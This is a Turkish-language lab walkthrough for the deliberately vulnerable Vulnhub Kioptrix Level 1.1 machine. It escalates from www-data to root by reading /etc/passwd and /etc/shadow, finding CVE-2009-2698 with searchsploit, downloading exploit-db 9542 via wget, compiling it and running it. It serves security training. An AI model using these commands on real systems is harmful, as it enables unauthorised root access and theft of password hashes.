Yazıda kullanılan Kioptrix: Seviye – 1.1 (#2) sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www-data) haklarına sahip olunduğu görülmektedir.
id
head -3 /etc/passwd
head -3 /etc/shadow
İşletim sisteminin sürüm bilgilerine bakıldığında Centos 4.5 kullanıldığı ve Linux çekirdek sürümünün 2.6.9-55 olduğu görülmektedir.
uname -a
cat /etc/redhat-release
Linux Kernel 2.6.9-55’te birçok kritik zafiyet bulunmaktadır.
searchsploit Linux Kernel -t 2.6.| grep -v “/dos/”
Bu zafiyete ait istismar kodlarının en önemlilerinden biri de Exploit-db’de 9542 numaralı istismar kodudur.
CVE-2009-2698 ID’li bu zafiyet UDP implementasyonundan kaynaklanmaktadır. Bu zafiyet ile Linux’un 2.6.19 sürümünden daha eski çekirdeklerde udp_sendmsg fonksiyonu istismar edilebilemekte ve hak yükseltilebilmektedir.
https://www.exploit-db.com/exploits/9542/
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)
Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.
pwd
ls
wget https://www.exploit-db.com/download/9542 –no-check-certificate -O IstismarKaynakKodu.c
ls -la
İstismar kodu derlenir.
gcc IstismarKaynakKodu.c -o HakYukseltme
ls -la
Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.
./HakYukseltme
id
head -3 /etc/shadow
Kaynak:
https://jhalon.github.io/vulnhub-kioptrix2/
https://kongwenbin.wordpress.com/2016/10/29/writeup-for-kioptrix-level-1-1-2/